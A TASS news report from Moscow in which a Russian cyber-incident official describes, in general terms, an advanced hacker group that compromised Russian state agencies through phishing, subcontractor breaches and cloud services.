MOSCOW, May 18. /TASS/. Hacker groups attacking Russian objects have the same grade of resources as foreign intelligence agencies, National Coordination Center for Computer Incidents Deputy Director Nikolai Murashov said Tuesday.
"Considering the complexity of means and methods used by the perpetrators, as well as the speed of their operation, we have reasons to believe that this group has resources of foreign intelligence agencies’ grade," Murashov said.
According to Murashov, the analysis of a series of computer attacks on Russian state agencies’ resources was carried out together with Rostelecom-Solar specialists.
The report, obtained by TASS, calls the hacker group the most advanced "cyber mercenaries that pursue interests of a foreign state."
The report notes that, when attacking Russian infrastructure, the group uses Russia’s own external resources (Yandex and Mail.ru clouds), uses new, never before seen software, combines several types of attacks and makes it impossible to detect such cyberattacks via standard means.
The cyberattacks mostly aim to completely compromise the IT infrastructure and steal confidential information (emails, shared and restricted-access files, infrastructure and logic charts, etc). The hackers used phishing emails mentioning the coronavirus pandemic, exploited the vulnerabilities of web apps, and hacked subcontractors’ infrastructure.
"The information came from tender venues, public data on state procurements, published press releases and so on. The next step was hacking the service providers’ infrastructure, which allowed the perpetrators to legitimately log in to required infrastructures of federal agencies," the document says.
Then, the hackers attacked IT admins’ workstations with high privilege levels. The group achieved a relatively high level of stealth by using legitimate system utilities and undetectable malware. After compromising the infrastructure totally, the perpetrators began gathering information from all sources of interest.